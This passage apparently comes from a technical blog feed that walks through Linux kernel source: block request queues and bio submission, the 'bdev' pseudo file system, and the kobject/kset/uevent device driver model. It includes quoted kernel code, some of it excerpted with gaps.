return blk_init_queue_node(rfn, lock, NUMA_NO_NODE);
}
struct request_queue *
blk_init_queue_node(request_fn_proc *rfn, spinlock_t *lock, int node_id)
{
struct request_queue *uninit_q, *q;
uninit_q = blk_alloc_queue_node(GFP_KERNEL, node_id);
if (!uninit_q)
return NULL;
q = blk_init_allocated_queue(uninit_q, rfn, lock);
if (!q)
blk_cleanup_queue(uninit_q);
return q;
}
typedef void (request_fn_proc) (struct request_queue *q);
/* struct request_queue represents a request queue. It is a very complicated structure. */
struct request_queue {
/*
* Together with queue_head for cacheline sharing
*/
struct list_head queue_head;
struct request *last_merge;
struct elevator_queue *elevator;
int nr_rqs[2]; /* # allocated [a]sync rqs */
int nr_rqs_elvpriv; /* # allocated rqs w/ elvpriv */
/*
* If blkcg is not used, @q->root_rl serves all requests. If blkcg
* is used, root blkg allocates from @q->root_rl and all other
* blkgs from their own blkg->rl. Which one to use should be
* determined using bio_request_list().
*/
struct request_list root_rl;
request_fn_proc *request_fn;
make_request_fn *make_request_fn;
prep_rq_fn *prep_rq_fn;
unprep_rq_fn *unprep_rq_fn;
merge_bvec_fn *merge_bvec_fn;
softirq_done_fn *softirq_done_fn;
rq_timed_out_fn *rq_timed_out_fn;
dma_drain_needed_fn *dma_drain_needed;
lld_busy_fn *lld_busy_fn;
struct blk_mq_ops *mq_ops;
unsigned int *mq_map;
/* sw queues */
struct blk_mq_ctx *queue_ctx;
unsigned int nr_queues;
/* hw dispatch queues */
struct blk_mq_hw_ctx **queue_hw_ctx;
unsigned int nr_hw_queues;
/*
* Dispatch queue sorting
*/
sector_t end_sector;
struct request *boundary_rq;
/*
* Delayed queue handling
*/
struct delayed_work delay_work;
struct backing_dev_info backing_dev_info;
/*
* The queue owner gets to use this for whatever they like.
* ll_rw_blk doesn't touch it.
*/
void *queuedata;
/*
* various queue flags, see QUEUE_* below
*/
unsigned long queue_flags;
...};
</code></pre></div></div>
<p>‘queue_head’ links all of the requests added to this queue. The list’s element is struct ‘request’, which represents one request. The kernel will reorder or merge requests for performance.
‘request_fn’ is the request handler function the driver implements. When other subsystems need to read or write data on the block device, the kernel will call this function if the device driver uses the ‘request’ method.
‘make_request_fn’: if the device driver uses ‘blk_init_queue’ to handle requests (the ‘request’ method), the kernel installs the standard function ‘blk_queue_bio’ in this field. If the device driver uses the ‘make_request’ method, it needs to call ‘blk_queue_make_request’ to provide its own implementation for this field. ‘blk_queue_make_request’ doesn’t allocate the request queue, so with the ‘make_request’ method the device driver needs to allocate the request queue itself with ‘blk_alloc_queue’.
‘queue_flags’ indicates the request queue’s status, for example ‘QUEUE_FLAG_STOPPED’, ‘QUEUE_FLAG_PLUGGED’, ‘QUEUE_FLAG_QUEUED’ and so on.</p>
<p>Every request is represented by a struct request.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct request {
union {
struct list_head queuelist;
struct llist_node ll_list;
};
union {
struct call_single_data csd;
struct work_struct mq_flush_data;
};
struct request_queue *q;
struct blk_mq_ctx *mq_ctx;
u64 cmd_flags;
enum rq_cmd_type_bits cmd_type;
unsigned long atomic_flags;
int cpu;
/* the following two fields are internal, NEVER access directly */
unsigned int __data_len; /* total data len */
sector_t __sector; /* sector cursor */
struct bio *bio;
struct bio *biotail;
struct hlist_node hash; /* merge hash */
/*
* The rb_node is only used inside the io scheduler, requests
* are pruned when moved to the dispatch queue. So let the
* completion_data share space with the rb_node.
*/
union {
struct rb_node rb_node; /* sort/lookup */
void *completion_data;
};
/*
* Three pointers are available for the IO schedulers, if they need
* more they have to dynamically allocate it. Flush requests are
* never put on the IO scheduler. So let the flush fields share
* space with the elevator data.
*/
union {
struct {
struct io_cq *icq;
void *priv[2];
} elv;
struct {
unsigned int seq;
struct list_head list;
rq_end_io_fn *saved_end_io;
} flush;
};
struct gendisk *rq_disk;
struct hd_struct *part;
unsigned long start_time;
#ifdef CONFIG_BLK_CGROUP
struct request_list *rl; /* rl this rq is alloced from */
unsigned long long start_time_ns;
unsigned long long io_start_time_ns; /* when passed to hardware */
#endif
/* Number of scatter-gather DMA addr+len pairs after
* physical address coalescing is performed.
*/
unsigned short nr_phys_segments;
#if defined(CONFIG_BLK_DEV_INTEGRITY)
unsigned short nr_integrity_segments;
#endif
unsigned short ioprio;
void *special; /* opaque pointer available for LLD use */
char *buffer; /* kaddr of the current segment if available */
int tag;
int errors;
/*
* when request is used as a packet command carrier
*/
unsigned char __cmd[BLK_MAX_CDB];
unsigned char *cmd;
unsigned short cmd_len;
unsigned int extra_len; /* length of alignment and padding */
unsigned int sense_len;
unsigned int resid_len; /* residual count */
void *sense;
unsigned long deadline;
struct list_head timeout_list;
unsigned int timeout;
int retries;
/*
* completion callback.
*/
rq_end_io_fn *end_io;
void *end_io_data;
/* for bidi */
struct request *next_rq;
};
</code></pre></div></div>
<p>‘queuelist’ links this request into a list, for example the request queue’s queue_head or a struct blk_plug’s list.
‘q’ is the request queue this request is attached to.
‘__data_len’ is the total number of bytes this request transfers.
‘__sector’ is the starting sector.
‘bio’ and ‘biotail’: when a bio is translated into or merged with a request, the request links these bios. If the device driver uses the ‘request’ method, it can access these bios in the request handler function.</p>
<p>So let’s look at the ‘blk_init_queue_node’ function. It calls two functions which, as their names indicate, allocate and initialize a queue. ‘blk_alloc_queue_node’ allocates a queue and does some basic initialization; the rest of the initialization is done in ‘blk_init_allocated_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct request_queue *
blk_init_allocated_queue(struct request_queue *q, request_fn_proc *rfn,
spinlock_t *lock)
{
if (!q)
return NULL;
if (blk_init_rl(&q->root_rl, q, GFP_KERNEL))
return NULL;
q->request_fn = rfn;
q->prep_rq_fn = NULL;
q->unprep_rq_fn = NULL;
q->queue_flags |= QUEUE_FLAG_DEFAULT;
/* Override internal queue lock with supplied lock pointer */
if (lock)
q->queue_lock = lock;
/*
* This also sets hw/phys segments, boundary and size
*/
blk_queue_make_request(q, blk_queue_bio);
q->sg_reserved_size = INT_MAX;
/* Protect q->elevator from elevator_change */
mutex_lock(&q->sysfs_lock);
/* init elevator */
if (elevator_init(q, NULL)) {
mutex_unlock(&q->sysfs_lock);
return NULL;
}
mutex_unlock(&q->sysfs_lock);
return q;
}
</code></pre></div></div>
<p>We can see the assignment of ‘q->request_fn’ and calls of ‘blk_queue_make_request’.
‘blk_queue_bio’ will be used to generate the new requests and finally calls the device driver implement’s ‘request_fn’.
Later is to call ‘elevator_init’. Kernel uses the ‘elevator algorithm’ to schedule the block requests. ‘elevator_init’ chooses a elevator algorithm for queue ‘q’. Here we will not care the detail of which algorithm the kernel uses.
For now, we just need know the ‘blk_init_queue’ allocates and initializes a request queue for the block device, and chooses a schedule algorithm.</p>
<p>For the ‘make_request’ method, the device driver first call ‘blk_alloc_queue’to allocates a request queue and then call ‘blk_queue_make_request’ to assign the self-implementation make_request function to ‘q->make_request_fn’.</p>
<h3 id="submit-requests-to-block-devices">submit requests to block devices</h3>
<p>When the file system need to read or write data from disk, it need to send requests to the device’s request queue, this is done by ‘submit_io’.
‘bio’ contains the request’s detail.
When ‘submit_io’ is called, the struct bio has been created. Here we don’t care how to create a bio but just focus how the block device driver handle it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void submit_bio(int rw, struct bio *bio)
{
bio->bi_rw |= rw;
/*
* If it's a regular read/write or a barrier with data attached,
* go through the normal accounting stuff before submission.
*/
if (bio_has_data(bio)) {
unsigned int count;
if (unlikely(rw & REQ_WRITE_SAME))
count = bdev_logical_block_size(bio->bi_bdev) >> 9;
else
count = bio_sectors(bio);
if (rw & WRITE) {
count_vm_events(PGPGOUT, count);
} else {
task_io_account_read(bio->bi_size);
count_vm_events(PGPGIN, count);
}
if (unlikely(block_dump)) {
char b[BDEVNAME_SIZE];
printk(KERN_DEBUG "%s(%d): %s block %Lu on %s (%u sectors)\n",
current->comm, task_pid_nr(current),
(rw & WRITE) ? "WRITE" : "READ",
(unsigned long long)bio->bi_sector,
bdevname(bio->bi_bdev, b),
count);
}
}
generic_make_request(bio);
}
void generic_make_request(struct bio *bio)
{
struct bio_list bio_list_on_stack;
if (!generic_make_request_checks(bio))
return;
/*
* We only want one ->make_request_fn to be active at a time, else
* stack usage with stacked devices could be a problem. So use
* current->bio_list to keep a list of requests submited by a
* make_request_fn function. current->bio_list is also used as a
* flag to say if generic_make_request is currently active in this
* task or not. If it is NULL, then no make_request is active. If
* it is non-NULL, then a make_request is active, and new requests
* should be added at the tail
*/
if (current->bio_list) {
bio_list_add(current->bio_list, bio);
return;
}
/* following loop may be a bit non-obvious, and so deserves some
* explanation.
* Before entering the loop, bio->bi_next is NULL (as all callers
* ensure that) so we have a list with a single bio.
* We pretend that we have just taken it off a longer list, so
* we assign bio_list to a pointer to the bio_list_on_stack,
* thus initialising the bio_list of new bios to be
* added. ->make_request() may indeed add some more bios
* through a recursive call to generic_make_request. If it
* did, we find a non-NULL value in bio_list and re-enter the loop
* from the top. In this case we really did just take the bio
* of the top of the list (no pretending) and so remove it from
* bio_list, and call into ->make_request() again.
*/
BUG_ON(bio->bi_next);
bio_list_init(&bio_list_on_stack);
current->bio_list = &bio_list_on_stack;
do {
struct request_queue *q = bdev_get_queue(bio->bi_bdev);
q->make_request_fn(q, bio);
bio = bio_list_pop(current->bio_list);
} while (bio);
current->bio_list = NULL; /* deactivate */
}
</code></pre></div></div>
<p>The most work is done by ‘generic_make_request’. First check if the process has request to handle, if it is add this new bio to ‘current->bio_list’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (current->bio_list) {
bio_list_add(current->bio_list, bio);
return;
}
</code></pre></div></div>
<p>Then for every bio, it calls the ‘make_request_fn’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do {
struct request_queue *q = bdev_get_queue(bio->bi_bdev);
q->make_request_fn(q, bio);
bio = bio_list_pop(current->bio_list);
} while (bio);
</code></pre></div></div>
<p>If the block device driver uses ‘request’, the ‘make_request_fn’ is ‘blk_queue_bio.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void blk_queue_bio(struct request_queue *q, struct bio *bio)
{
const bool sync = !!(bio->bi_rw & REQ_SYNC);
struct blk_plug *plug;
int el_ret, rw_flags, where = ELEVATOR_INSERT_SORT;
struct request *req;
unsigned int request_count = 0;
/*
* low level driver can indicate that it wants pages above a
* certain limit bounced to low memory (ie for highmem, or even
* ISA dma in theory)
*/
blk_queue_bounce(q, &bio);
if (bio_integrity_enabled(bio) && bio_integrity_prep(bio)) {
bio_endio(bio, -EIO);
return;
}
if (bio->bi_rw & (REQ_FLUSH | REQ_FUA)) {
spin_lock_irq(q->queue_lock);
where = ELEVATOR_INSERT_FLUSH;
goto get_rq;
}
/*
* Check if we can merge with the plugged list before grabbing
* any locks.
*/
if (blk_attempt_plug_merge(q, bio, &request_count))
return;
spin_lock_irq(q->queue_lock);
el_ret = elv_merge(q, &req, bio);
if (el_ret == ELEVATOR_BACK_MERGE) {
if (bio_attempt_back_merge(q, req, bio)) {
elv_bio_merged(q, req, bio);
if (!attempt_back_merge(q, req))
elv_merged_request(q, req, el_ret);
goto out_unlock;
}
} else if (el_ret == ELEVATOR_FRONT_MERGE) {
if (bio_attempt_front_merge(q, req, bio)) {
elv_bio_merged(q, req, bio);
if (!attempt_front_merge(q, req))
elv_merged_request(q, req, el_ret);
goto out_unlock;
}
}
get_rq:
/*
* This sync check and mask will be re-done in init_request_from_bio(),
* but we need to set it earlier to expose the sync flag to the
* rq allocator and io schedulers.
*/
rw_flags = bio_data_dir(bio);
if (sync)
rw_flags |= REQ_SYNC;
/*
* Grab a free request. This is might sleep but can not fail.
* Returns with the queue unlocked.
*/
req = get_request(q, rw_flags, bio, GFP_NOIO);
if (unlikely(!req)) {
bio_endio(bio, -ENODEV); /* @q is dead */
goto out_unlock;
}
/*
* After dropping the lock and possibly sleeping here, our request
* may now be mergeable after it had proven unmergeable (above).
* We don't worry about that case for efficiency. It won't happen
* often, and the elevators are able to handle it.
*/
init_request_from_bio(req, bio);
if (test_bit(QUEUE_FLAG_SAME_COMP, &q->queue_flags))
req->cpu = raw_smp_processor_id();
plug = current->plug;
if (plug) {
/*
* If this is the first request added after a plug, fire
* of a plug trace.
*/
if (!request_count)
trace_block_plug(q);
else {
if (request_count >= BLK_MAX_REQUEST_COUNT) {
blk_flush_plug_list(plug, false);
trace_block_plug(q);
}
}
list_add_tail(&req->queuelist, &plug->list);
blk_account_io_start(req, true);
} else {
spin_lock_irq(q->queue_lock);
add_acct_request(q, req, where);
__blk_run_queue(q);
out_unlock:
spin_unlock_irq(q->queue_lock);
}
}
</code></pre></div></div>
<p>‘blk_queue_bio’ reorders or merges the bio with current requests if it can. If not, this function allocates a new request and uses the bio to initializes the request. The requests are processed in function ‘__blk_run_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void __blk_run_queue(struct request_queue *q)
{
if (unlikely(blk_queue_stopped(q)))
return;
__blk_run_queue_uncond(q);
}
inline void __blk_run_queue_uncond(struct request_queue *q)
{
if (unlikely(blk_queue_dead(q)))
return;
/*
* Some request_fn implementations, e.g. scsi_request_fn(), unlock
* the queue lock internally. As a result multiple threads may be
* running such a request function concurrently. Keep track of the
* number of active request_fn invocations such that blk_drain_queue()
* can wait until all these request_fn calls have finished.
*/
q->request_fn_active++;
q->request_fn(q);
q->request_fn_active--;
}
</code></pre></div></div>
<p>In here we see it call the ‘request_fn’ we implement in device driver.
For now we can distinguish the difference ‘request’ and ‘make_request’ method. When the block device driver uses ‘request’, the file system send the bio to block subsystem it is processed by the ‘blk_queue_bio’, ‘blk_queue_bio’ do a lot of work to optimize the bio and convert the bio to requests and call the driver’s implementation of ‘request_fn’ callback. As for ‘make_request’ method, the driver actually implement his own ‘blk_queue_bio’, so these bio will not go to the IO scheduler and goes directly to the device driver’s implementation of ‘make_request_fn’. So the self-implementation of ‘make_request_fn’ need to process the bios directly, not the request.
Most of the block device driver will use the ‘request’ method.
So end of the long article, hope you enjoy it.</p>
Anatomy of the Linux 'bdev' file system2018-06-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/14/linux-bdev-file-system
<p>‘bdev’ file system is used for block device’s inode.
This fs is initialized in function ‘bdev_cache_init’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init bdev_cache_init(void)
{
int err;
static struct vfsmount *bd_mnt;
bdev_cachep = kmem_cache_create("bdev_cache", sizeof(struct bdev_inode),
0, (SLAB_HWCACHE_ALIGN|SLAB_RECLAIM_ACCOUNT|
SLAB_MEM_SPREAD|SLAB_PANIC),
init_once);
err = register_filesystem(&bd_type);
if (err)
panic("Cannot register bdev pseudo-fs");
bd_mnt = kern_mount(&bd_type);
if (IS_ERR(bd_mnt))
panic("Cannot create bdev pseudo-fs");
blockdev_superblock = bd_mnt->mnt_sb; /* For writeback */
#define kern_mount(type) kern_mount_data(type, NULL)
struct vfsmount *kern_mount_data(struct file_system_type *type, void *data)
{
struct vfsmount *mnt;
mnt = vfs_kern_mount(type, MS_KERNMOUNT, type->name, data);
if (!IS_ERR(mnt)) {
/*
* it is a longterm mount, don't release mnt until
* we unmount before file sys is unregistered
*/
real_mount(mnt)->mnt_ns = MNT_NS_INTERNAL;
}
return mnt;
}
struct vfsmount *
vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
{
struct mount *mnt;
struct dentry *root;
if (!type)
return ERR_PTR(-ENODEV);
mnt = alloc_vfsmnt(name);
if (!mnt)
return ERR_PTR(-ENOMEM);
if (flags & MS_KERNMOUNT)
mnt->mnt.mnt_flags = MNT_INTERNAL;
root = mount_fs(type, flags, name, data);
if (IS_ERR(root)) {
free_vfsmnt(mnt);
return ERR_CAST(root);
}
mnt->mnt.mnt_root = root;
mnt->mnt.mnt_sb = root->d_sb;
mnt->mnt_mountpoint = mnt->mnt.mnt_root;
mnt->mnt_parent = mnt;
lock_mount_hash();
list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
unlock_mount_hash();
return &mnt->mnt;
}
</code></pre></div></div>
<p>After registering ‘bdev’ fs, the initialize function mounts it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct dentry *
mount_fs(struct file_system_type *type, int flags, const char *name, void *data)
{
struct dentry *root;
struct super_block *sb;
char *secdata = NULL;
int error = -ENOMEM;
...
root = type->mount(type, flags, name, data);
if (IS_ERR(root)) {
error = PTR_ERR(root);
goto out_free_secdata;
}
sb = root->d_sb;
BUG_ON(!sb);
WARN_ON(!sb->s_bdi);
WARN_ON(sb->s_bdi == &default_backing_dev_info);
sb->s_flags |= MS_BORN;
...
/*
* filesystems should never set s_maxbytes larger than MAX_LFS_FILESIZE
* but s_maxbytes was an unsigned long long for many releases. Throw
* this warning for a little while to try and catch filesystems that
* violate this rule.
*/
WARN((sb->s_maxbytes < 0), "%s set sb->s_maxbytes to "
"negative value (%lld)\n", type->name, sb->s_maxbytes);
up_write(&sb->s_umount);
free_secdata(secdata);
return root;
out_sb:
dput(root);
deactivate_locked_super(sb);
out_free_secdata:
free_secdata(secdata);
out:
return ERR_PTR(error);
}
</code></pre></div></div>
<p>‘mount_fs’ first call ‘type->mount’ to get a root dentry. This type->mount is ‘‘bd_mount’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct dentry *bd_mount(struct file_system_type *fs_type,
int flags, const char *dev_name, void *data)
{
return mount_pseudo(fs_type, "bdev:", &bdev_sops, NULL, BDEVFS_MAGIC);
}
struct dentry *mount_pseudo(struct file_system_type *fs_type, char *name,
const struct super_operations *ops,
const struct dentry_operations *dops, unsigned long magic)
{
struct super_block *s;
struct dentry *dentry;
struct inode *root;
struct qstr d_name = QSTR_INIT(name, strlen(name));
s = sget(fs_type, NULL, set_anon_super, MS_NOUSER, NULL);
if (IS_ERR(s))
return ERR_CAST(s);
s->s_maxbytes = MAX_LFS_FILESIZE;
s->s_blocksize = PAGE_SIZE;
s->s_blocksize_bits = PAGE_SHIFT;
s->s_magic = magic;
s->s_op = ops ? ops : &simple_super_operations;
s->s_time_gran = 1;
root = new_inode(s);
if (!root)
goto Enomem;
/*
* since this is the first inode, make it number 1. New inodes created
* after this must take care not to collide with it (by passing
* max_reserved of 1 to iunique).
*/
root->i_ino = 1;
root->i_mode = S_IFDIR | S_IRUSR | S_IWUSR;
root->i_atime = root->i_mtime = root->i_ctime = CURRENT_TIME;
dentry = __d_alloc(s, &d_name);
if (!dentry) {
iput(root);
goto Enomem;
}
d_instantiate(dentry, root);
s->s_root = dentry;
s->s_d_op = dops;
s->s_flags |= MS_ACTIVE;
return dget(s->s_root);
Enomem:
deactivate_locked_super(s);
return ERR_PTR(-ENOMEM);
}
</code></pre></div></div>
<p>In’ mount_pseudo’, we first allocate a super_block and then allocate the root inode and dentry and initialize these data. The super_operations for this ‘bdev’ fs is ‘bdev_sops’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct super_operations bdev_sops = {
.statfs = simple_statfs,
.alloc_inode = bdev_alloc_inode,
.destroy_inode = bdev_destroy_inode,
.drop_inode = generic_delete_inode,
.evict_inode = bdev_evict_inode,
};
</code></pre></div></div>
<p>Finally the super block in ‘bd_mnt->mnt_sb’ is assigned the global variable ‘blockdev_superblock’. After ‘bdev’ is registered, the structure has following shape.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> super_operations
+--------------+
| |
+--------------|
|bdev_alloc_inode
blockde^_superblock +--------------+
+----------+ | |
| | | |
| | | |
+----------+ | |
| s_op +---------> +--------------+
+----------+
| s_root +---------> +--------------+ inode
+----------+ | | +---------+
| | | |
| | | |
| | | |
+--------------+ | |
| d_inode +-------> +---------+
+--------------+
dentry
</code></pre></div></div>
Anatomy of the Linux device driver model2018-06-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/10/linux-device-driver-model
<p>Welcome back the anatomy series articles, this one we will talk about the Linux device driver model.</p>
<h2 id="kobject-and-kset">kobject and kset</h2>
<p>kobject and kset is the basis of device driver model. Every kobject represent a kernel object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kobject {
const char *name;
struct list_head entry;
struct kobject *parent;
struct kset *kset;
struct kobj_type *ktype;
struct sysfs_dirent *sd;
struct kref kref;
#ifdef CONFIG_DEBUG_KOBJECT_RELEASE
struct delayed_work release;
#endif
unsigned int state_initialized:1;
unsigned int state_in_sysfs:1;
unsigned int state_add_uevent_sent:1;
unsigned int state_remove_uevent_sent:1;
unsigned int uevent_suppress:1;
};
</code></pre></div></div>
<p>‘name’ indicates the object’s name and will be show in a directory in sysfs file system.
‘parent’ indicates the object’s parent, this makes objects’ hierarchical structure.
‘kset’ can be considered as a connection of the same kobject.
‘ktype’ represents the object’s type, different objects has different type. kernel connects ‘ktype’ with the object’s sysfs’s file operations and attributes file.
‘sd’ indicates a directory entry instance in sysfs file syste.
‘uevent_suppress’ indicates whether the ‘kset’ of this object belongs to should send an uevent to the userspace.</p>
<p>‘kobject_init’ function is used to initialize a kobject.
‘kobject_add’ function create the object hierarchical and also create directory in sysfs, this directory will lies in ‘parent’ (while a parent is not NULL) or in the kset directory(parent is NULL) or in the root(if both NULL).</p>
<h3 id="kobjects-attributes">kobject’s attributes</h3>
<p>There is a kobj_type field in kobject。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct kobj_type {
void (*release)(struct kobject *kobj);
const struct sysfs_ops *sysfs_ops;
struct attribute **default_attrs;
const struct kobj_ns_type_operations *(*child_ns_type)(struct kobject *kobj);
const void *(*namespace)(struct kobject *kobj);
};
struct sysfs_ops {
ssize_t (*show)(struct kobject *, struct attribute *, char *);
ssize_t (*store)(struct kobject *, struct attribute *, const char *, size_t);
};
struct attribute {
const char *name;
umode_t mode;
#ifdef CONFIG_DEBUG_LOCK_ALLOC
bool ignore_lockdep:1;
struct lock_class_key *key;
struct lock_class_key skey;
#endif
};
</code></pre></div></div>
<p>‘default_attrs’ defines some attributes and sysfs_ops defines the operations that operates the attribute.</p>
<p>‘sysfs_create_file’ can be used for creating an attribute file in kobject.
When the userspace opena file in sysfs, ‘sysfs_open_file’ will be called, it allocates a struct ‘struct sysfs_open_file ’ of and call ‘sysfs_get_open_dirent’, the later will set the</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ((struct seq_file *)file->private_data)->private = data;
</code></pre></div></div>
<p>Later in writing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static ssize_t sysfs_write_file(struct file *file, const char __user *user_buf,
size_t count, loff_t *ppos)
{
struct sysfs_open_file *of = sysfs_of(file);
ssize_t len = min_t(size_t, count, PAGE_SIZE);
loff_t size = file_inode(file)->i_size;
char *buf;
if (sysfs_is_bin(of->sd) && size) {
if (size <= *ppos)
return 0;
len = min_t(ssize_t, len, size - *ppos);
}
if (!len)
return 0;
buf = kmalloc(len + 1, GFP_KERNEL);
if (!buf)
return -ENOMEM;
if (copy_from_user(buf, user_buf, len)) {
len = -EFAULT;
goto out_free;
}
buf[len] = '\0'; /* guarantee string termination */
len = flush_write_buffer(of, buf, *ppos, len);
if (len > 0)
*ppos += len;
out_free:
kfree(buf);
return len;
}
static struct sysfs_open_file *sysfs_of(struct file *file)
{
return ((struct seq_file *)file->private_data)->private;
}
static int flush_write_buffer(struct sysfs_open_file *of, char *buf, loff_t off,
size_t count)
{
struct kobject *kobj = of->sd->s_parent->s_dir.kobj;
int rc = 0;
const struct sysfs_ops *ops = sysfs_file_ops(of->sd);
rc = ops->store(kobj, of->sd->s_attr.attr, buf, count);
return rc;
}
</code></pre></div></div>
<p>call the sysfs_ops store through sysfs_open_file struct of.</p>
<h3 id="kset">kset</h3>
<p>kset is a collection of kobjects, it self is a kobject so it has a kobject field.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kset {
struct list_head list;
spinlock_t list_lock;
struct kobject kobj;
const struct kset_uevent_ops *uevent_ops;
};
</code></pre></div></div>
<p>‘list’ links the kobjects belongs to this kset.
‘uevent_ops’ defines some function pointers, when some of the kobjects’ status has changed, it will call these function pointers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kset_uevent_ops {
int (* const filter)(struct kset *kset, struct kobject *kobj);
const char *(* const name)(struct kset *kset, struct kobject *kobj);
int (* const uevent)(struct kset *kset, struct kobject *kobj,
struct kobj_uevent_env *env);
};
</code></pre></div></div>
<p>We can use ‘kset_register’ to register and add a kset to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kset_register(struct kset *k)
{
int err;
if (!k)
return -EINVAL;
kset_init(k);
err = kobject_add_internal(&k->kobj);
if (err)
return err;
kobject_uevent(&k->kobj, KOBJ_ADD);
return 0;
}
</code></pre></div></div>
<p>The only interesting thing is ‘kobject_uevent’, this is used to send an event to userspace that something about kobject has happened, KOBJ_ADD for this example. So if one kobject doen’t belong to no kset, he can’t send such event to userspace.
Below show the relation between kset and kobject.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kset
+-----------+-----+
uevent_ops<----+ |kobj | |
| | | |
+-----+--+--+-----+
^
|parent
kset |
+--------+--+-----+
uevent_ops<----+ |kobj | |
+ +----+ | | |
| +-----+-----+-----+
list| ^
| |kset
v |
+-----+ +-----+ +-----+
|kobj +---> |kobj +------> |kobj |
| | | | | |
+-----+ +--+--+ +-----+
^
|parent
|
+--+--+
|kobj |
| |
+-----+
</code></pre></div></div>
<h3 id="uevent-and-call_usermodehelper">uevent and call_usermodehelper</h3>
<p>Hotplug mechanism can be considered as follows, when one device plug into the system , the kernel can notify the userspace program and the userspace program can load the device’s driver, when it removes, it can remove the driver. There ares two methods to notify the userspace, one is udev and the other is /sbin/hotplug. Both need the kernel’s support, kobject_uevent’. This function is the base of udev or /sbin/hotplug, it can send uevent or call call_usermodehelper function to create a user process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kobject_uevent(struct kobject *kobj, enum kobject_action action)
{
return kobject_uevent_env(kobj, action, NULL);
}
int kobject_uevent_env(struct kobject *kobj, enum kobject_action action,
char *envp_ext[])
{
struct kobj_uevent_env *env;
const char *action_string = kobject_actions[action];
const char *devpath = NULL;
const char *subsystem;
struct kobject *top_kobj;
struct kset *kset;
const struct kset_uevent_ops *uevent_ops;
int i = 0;
int retval = 0;
#ifdef CONFIG_NET
struct uevent_sock *ue_sk;
#endif
pr_debug("kobject: '%s' (%p): %s\n",
kobject_name(kobj), kobj, __func__);
/* search the kset we belong to */
top_kobj = kobj;
while (!top_kobj->kset && top_kobj->parent)
top_kobj = top_kobj->parent;
if (!top_kobj->kset) {
pr_debug("kobject: '%s' (%p): %s: attempted to send uevent "
"without kset!\n", kobject_name(kobj), kobj,
__func__);
return -EINVAL;
}
kset = top_kobj->kset;
uevent_ops = kset->uevent_ops;
/* skip the event, if uevent_suppress is set*/
if (kobj->uevent_suppress) {
pr_debug("kobject: '%s' (%p): %s: uevent_suppress "
"caused the event to drop!\n",
kobject_name(kobj), kobj, __func__);
return 0;
}
/* skip the event, if the filter returns zero. */
if (uevent_ops && uevent_ops->filter)
if (!uevent_ops->filter(kset, kobj)) {
pr_debug("kobject: '%s' (%p): %s: filter function "
"caused the event to drop!\n",
kobject_name(kobj), kobj, __func__);
return 0;
}
/* default keys */
retval = add_uevent_var(env, "ACTION=%s", action_string);
if (retval)
goto exit;
retval = add_uevent_var(env, "DEVPATH=%s", devpath);
if (retval)
goto exit;
retval = add_uevent_var(env, "SUBSYSTEM=%s", subsystem);
if (retval)
goto exit;
/* let the kset specific function add its stuff */
if (uevent_ops && uevent_ops->uevent) {
retval = uevent_ops->uevent(kset, kobj, env);
if (retval) {
pr_debug("kobject: '%s' (%p): %s: uevent() returned "
"%d\n", kobject_name(kobj), kobj,
__func__, retval);
goto exit;
}
}
/*
#if defined(CONFIG_NET)
/* send netlink message */
list_for_each_entry(ue_sk, &uevent_sock_list, list) {
struct sock *uevent_sock = ue_sk->sk;
struct sk_buff *skb;
size_t len;
if (!netlink_has_listeners(uevent_sock, 1))
continue;
/* allocate message with the maximum possible size */
len = strlen(action_string) + strlen(devpath) + 2;
skb = alloc_skb(len + env->buflen, GFP_KERNEL);
if (skb) {
char *scratch;
/* add header */
scratch = skb_put(skb, len);
sprintf(scratch, "%s@%s", action_string, devpath);
/* copy keys to our continuous event payload buffer */
for (i = 0; i < env->envp_idx; i++) {
len = strlen(env->envp[i]) + 1;
scratch = skb_put(skb, len);
strcpy(scratch, env->envp[i]);
}
NETLINK_CB(skb).dst_group = 1;
retval = netlink_broadcast_filtered(uevent_sock, skb,
0, 1, GFP_KERNEL,
kobj_bcast_filter,
kobj);
/* ENOBUFS should be handled in userspace */
if (retval == -ENOBUFS || retval == -ESRCH)
retval = 0;
} else
retval = -ENOMEM;
}
#endif
mutex_unlock(&uevent_sock_mutex);
/* call uevent_helper, usually only enabled during early boot */
if (uevent_helper[0] && !kobj_usermode_filter(kobj)) {
char *argv [3];
argv [0] = uevent_helper;
argv [1] = (char *)subsystem;
argv [2] = NULL;
retval = add_uevent_var(env, "HOME=/");
if (retval)
goto exit;
retval = add_uevent_var(env,
"PATH=/sbin:/bin:/usr/sbin:/usr/bin");
if (retval)
goto exit;
retval = call_usermodehelper(argv[0], argv,
